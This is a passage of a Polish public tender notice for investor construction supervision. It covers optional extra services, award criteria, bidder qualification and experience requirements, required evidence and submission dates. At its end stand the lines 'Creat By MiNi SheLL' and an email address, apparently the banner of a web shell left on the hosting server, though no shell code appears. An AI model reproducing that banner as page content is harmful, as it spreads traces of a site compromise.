polegającego na powtórzeniu podobnych usług, zamówienia na dodatkowe usług, które stanowić będą nie więcej niż 50 % wartości zamówienia podstawowego .<br/><br/>Zakres zamówienia na podobne usługi, w tym:<br/>-	pełnienia funkcji Inspektora Nadzoru Inwestorskiego (w branży konstrukcyjno-budowlanej, sanitarnej i elektrycznej) zgodnie z obowiązkami i prawami określonymi w art. 25 i 26 Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333 z późn. zm.) oraz zgodnie z postanowieniami odpowiednich decyzji i pozwoleń na prowadzenie budowy,<br/>-	sprawdzenie i akceptacja sporządzonych przez Wykonawcę harmonogramów rzeczowo-finansowych robót oraz zmian tych harmonogramów,<br/>-	kontrola prawidłowości prowadzenia dziennika budowy, potwierdzanie wpisem w dzienniku budowy wykonania prac, w tym ulegających zakryciu oraz dokonywanie w dzienniku budowy innych wpisów dokumentujących okoliczności mające znaczenie dla oceny właściwego wykonania robót,<br/>-	informowania na bieżąco Zamawiającego o przebiegu realizacji inwestycji,<br/>-	składania Zamawiającemu raportów z działalności obejmującej prowadzenie nadzoru robót oraz z realizacji inwestycji wraz z dokumentacją zdjęciową w okresach miesięcznych - „Sprawozdanie miesięczne”.<br/>-	oceny zgodności wbudowywanych materiałów z projektem i przepisami prawa oraz ich jakości,<br/>-	sprawdzania i weryfikowania kosztorysów na roboty budowlane, dodatkowe, zaniechane i zmianę technologii,<br/>-	obsługi prawnej inwestycji, w tym:<br/>- wsparciu inwestora w relacjach z wykonawcą, podwykonawcą, kierownikiem budowy, projektantami, <br/>- reagowanie w sytuacjach, które mogłyby w przyszłości skutkować sporem sądowym,<br/>- zajmowanie stanowiska w sprawach takich jak: przedłużenia terminów realizacji umowy, odbiory, kary umowne, materiały zamienne lub równoważne, roboty dodatkowe, zamienne i zaniechane, odstąpienie od umowy.<br/><br/>Oraz innych, przewidzianych we wzorze do umowy stanowiącej załącznik do SWZ, w tym: usługi zarządzania budową, usługi nadzoru budowlanego, usługi nadzoru i kontroli, usługi architektoniczne, budowlane, inżynieryjne i kontrolne, kalkulacja kosztów, monitoring kosztów, doradcze usługi inżynieryjne i budowlane, nadzór nad robotami budowlanymi, nadzór nad projektem i dokumentacją, usługi zarządzania umowami, usługi kontroli i nadzoru technicznego.<br/>(zamówienie powinno polegać na powtórzeniu podobnych usług lub robót budowlanych i powinno być zgodne z jego przedmiotem).<br/><br/>Zamawiający uwzględnił całkowitą wartość tego zamówienia przy obliczaniu wartości niniejszego zamówienia publicznego.<br/><br/>2/ W/w usługi zostaną udzielone w przypadku zaistnienia uzasadnionej potrzeby rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel, na podstawie odrębnej umowy.<br/><br/>Zlecenie w oparciu o wycenę prac Inspektora Nadzoru, po zaakceptowaniu przez Zamawiającego. Płatność w oparciu o rozliczenie procentowe w stosunku do wartości robót budowlanych odebranych przez Zamawiającego. W przypadku zmiany wynagrodzenia wykonawcy Zadania Inwestycyjnego, wynagrodzenie Nadzoru Inwestorskiego zostanie zmienione proporcjonalnie.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1/ Na podstawie art. 112 ust. 2 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/><br/>1) Zdolności do występowania w obrocie w gospodarczym.<br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. <br/><br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. <br/><br/>3) Sytuacji ekonomicznej lub finansowej:<br/>- posiada środki finansowe lub zdolność kredytową w wysokości min. 100 000,- zł. <br/><br/>4) Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni ten warunek udziału w postępowaniu, jeżeli wykaże, że <br/><br/>4.1/ wykonał usługi, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych usług, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz<br/>z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane<br/>lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, w tym:<br/><br/>- nie mniej niż 3 usługi polegające na:<br/><br/>Pełnieniu funkcji nadzoru inwestorskiego lub inwestora zastępczego przy budowie lub przebudowie budynku użyteczności publicznej o kubaturze min. 7000 m3 i powierzchni użytkowej min. 2000 m2. Każda z robót budowlanych powinna zawierać w swoim zakresie wykonanie instalacji wentylacji mechanicznej nawiewno-wywiewnej wraz z montażem centrali wentylacyjnej oraz wykonanie pokrycia dachowego wykonanego z izolacji termicznej oraz pokrycia bitumicznego o powierzchni min. 1000 m2. Jedna z ww. robót budowlanych ma mieć wartość min. 6 000 000,- zł brutto, każda z dwóch pozostałych ma mieć wartość min. 3 000 000,- zł brutto.<br/><br/>- nie mniej niż 1 usługę polegającą na:<br/><br/>Pełnieniu funkcji nadzoru inwestorskiego lub inwestora zastępczego przy budowie lub przebudowie budynku basenowego, w której skład wchodził montaż wodnych urządzeń zabawowych (np. zjeżdżalni, wodotrysków, wanien do hydromasażu), wraz z podłączeniem tych urządzeń do systemu uzdatniającego wodę. Ww. robota budowlana ma mieć wartość min. 500 000,- zł brutto.<br/><br/>UWAGA <br/>1) Za wykonanie usługi Zamawiający uzna doprowadzenie do wystawienia przez inwestora protokołu odbioru końcowego lub innego równoważnego dokumentu; <br/><br/>2) W przypadku gdy Wykonawca realizował zamówienie, jako jeden z grupy Wykonawców (konsorcjum) może powoływać się jedynie na swoje własne, realne doświadczenie, które zdobył realizując daną część zamówienia, która została mu przypisana w ramach grupy, tzn. może wykazywać się doświadczeniem jedynie w zakresie, jaki rzeczywiście wykonywał. Doświadczenia nie uzyskuje się poprzez sam udział w konsorcjum, lecz poprzez konkretne czynności realizowane w jego ramach. <br/><br/>3) Jeżeli zakres usług przedstawionych w dokumencie złożonym na potwierdzenie, że usługi zostały wykonane w sposób należyty i prawidłowo ukończone, jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie usług podać wartość usług potwierdzających spełnienie warunku udziału w postępowaniu. <br/><br/>4) Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu, kwoty będą wyrażone w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu zamieszczenia ogłoszenia w Dzienniku Urzędowym Unii Europejskiej (DUUE). Jeżeli w dniu opublikowania ogłoszenia o zamówieniu w DUUE, Narodowy Bank Polski nie opublikuje tabeli kursów walut, Wykonawca winien przyjąć kurs przeliczeniowy według ostatniej tabeli kursów NBP, opublikowanej przed dniem publikacji ogłoszenia o zamówieniu w DUUE. <br/><br/>5) Wykonawca jest obowiązany wykazać spełnienie warunków udziału w postępowaniu określonych w Ogłoszeniu o zamówieniu i SWZ, w sposób i za pomocą dowodów określonych w ustawie Pzp, w Rozporządzeniu Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz Ogłoszeniu o zamówieniu i w SWZ. <br/><br/>4.2/ dysponuje lub będzie dysponował osobami niezbędnymi do wykonania niniejszego zamówienia, tj. co najmniej: <br/><br/>a) jedną osobę - inspektor nadzoru w specjalności konstrukcyjno-budowlanej, pełniący jednocześnie funkcję kierownika zespołu Inspektorów Nadzoru osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń w specjalności konstrukcyjno-budowlanej, <br/>będącą czynnym członkiem odpowiedniej izby samorządu zawodowego,<br/>Osoba pełniąca w/w funkcję winna posiadać:<br/> – co najmniej 10-letnie doświadczenie zawodowe w nadzorowaniu robót w ww. specjalności, w tym co najmniej jednej roboty polegającej na budowie, oddanego do użytkowania i rozliczonego budynku użyteczności publicznej (budynek wraz z instalacjami, urządzeniami technicznymi, infrastrukturą i zagospodarowaniem terenu) o kubaturze nie mniejszej niż 7000 m3 i powierzchni użytkowej nie mniejszej niż 2000 m2. <br/>Każda z robót budowlanych powinna zawierać w swoim zakresie wykonanie instalacji wentylacji mechanicznej nawiewno-wywiewnej wraz z montażem centrali wentylacyjnej oraz wykonanie pokrycia dachowego wykonanego z izolacji termicznej oraz pokrycia bitumicznego o powierzchni min. 1000 m2.<br/><br/>Dodatkowo doświadczenie kierownika zespołu Inspektorów Nadzoru stanowi jedno z kryteriów oceny ofert i zostało opisane w rozdz. III pkt 5 ppkt 5.1 lit. 2) SWZ. Doświadczenie należy opisać w ofercie na etapie jej składania.<br/><br/>b) jedną osobę - inspektor nadzoru w specjalności sanitarnej – osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, <br/>będącą czynnym członkiem odpowiedniej izby samorządu zawodowego,<br/>Osoba pełniąca w/w funkcję winna posiadać:<br/>- co najmniej 10-letnie doświadczenie zawodowe w nadzorowaniu robót w obiektach kubaturowych w ww. specjalności, w tym co najmniej jednej roboty polegającej na budowie, oddanego do użytkowania i rozliczonego budynku użyteczności publicznej (budynek wraz z instalacjami, w tym wentylacyjną i klimatyzacyjną, urządzeniami technicznymi, infrastrukturą i zagospodarowaniem terenu) o kubaturze nie mniejszej niż 7000 m3 i powierzchni użytkowej nie mniejszej niż 2000 m2<br/>Każda z robót budowlanych powinna zawierać w swoim zakresie wykonanie instalacji wentylacji mechanicznej nawiewno-wywiewnej wraz z montażem centrali wentylacyjnej oraz wykonanie pokrycia dachowego wykonanego z izolacji termicznej oraz pokrycia bitumicznego o powierzchni min. 1000 m2.<br/><br/>c) jedną osobę - inspektor nadzoru w specjalności elektrycznej – osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>będącą czynnym członkiem odpowiedniej izby samorządu zawodowego,<br/>Osoba pełniąca w/w funkcję winna posiadać:<br/>- co najmniej 10-letnie doświadczenie zawodowe w nadzorowaniu robót w obiektach kubaturowych w ww. specjalności, w tym co najmniej jednej roboty polegającej na budowie, oddanego do użytkowania i rozliczonego budynku użyteczności publicznej (budynek wraz z instalacjami, urządzeniami technicznymi, infrastrukturą i zagospodarowaniem terenu) o kubaturze min. 7000 m3 i powierzchni użytkowej min. 2000 m2. <br/>Każda z robót budowlanych powinna zawierać w swoim zakresie wykonanie instalacji wentylacji mechanicznej nawiewno-wywiewnej wraz z montażem centrali wentylacyjnej oraz wykonanie pokrycia dachowego wykonanego z izolacji termicznej oraz pokrycia bitumicznego o powierzchni min. 1000 m2.<br/><br/>UWAGA!<br/>Zamawiający nie dopuszcza łączenia funkcji wymienionych w pkt 4.2/.<br/><br/>Każda z ww. osób winna posiadać uprawnienia budowlane zgodne z art. 12-16 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. 2020 r poz. 1333 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz być zrzeszona we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa lub spełniać warunki, o których mowa w art. 12a ustawy Prawo budowlane, tj. jej odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniać wymogi, o których mowa w art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">potwierdzających brak podstaw wykluczenia:<br/><br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną. <br/><br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej– składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/><br/>b) oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 poz.1076 i 1086) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej wg wzoru – załącznik nr 7 do SWZ <br/><br/>UWAGA: (dotyczy wszystkich dokumentów na potwierdzenie braku podstaw wykluczenia): <br/>W przypadku Wykonawców wspólnie składających ofertę dokumenty, o których mowa w ust. 9.2.1/ pkt a) – b), zobowiązany jest złożyć każdy z Wykonawców wspólnie składających ofertę.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">potwierdzających spełnianie warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej:<br/><br/>a) informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem (załącznik Wykonawcy);<br/><br/> potwierdzających spełnianie warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (doświadczenie, kwalifikacje zawodowe kadry technicznej):<br/><br/>a) wykaz usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;<br/>Wzór wykazu usług stanowi załącznik nr 5 do SWZ.<br/><br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami<br/>Wzór wykazu osób stanowi załącznik nr 6 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>- Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>- Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/><br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>3. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Z treści pełnomocnictwa powinno wynikać umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców. <br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/><br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadkach określonych w art. 455 PZP. Szczegółowy wykaz przewidzianych zmian umowy zawarto w załączniku nr 4 do SWZ „wzór umowy” , który w całości jest dostępny na stronie prowadzonego postępowania pod adresem https://bip.um.pruszkow.pl/ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dokumenty składane razem z oferta:<br/>- Oferta przygotowana na formularzu ofertowym.<br/><br/>- Oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu. <br/><br/>- wadium<br/>- Pełnomocnictwo – jeśli dotyczy.<br/><br/>- Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/><br/>- Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji.<br/><br/>- Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/><br/>Wszelkie wymagania dotyczące zakresu i formy dokumentów składających się na ofertę opisano w SWZ w Rozdz. II pkt. 9 ppkt. 9.1.

Creat By MiNi SheLL
Email: jattceo@gmail.com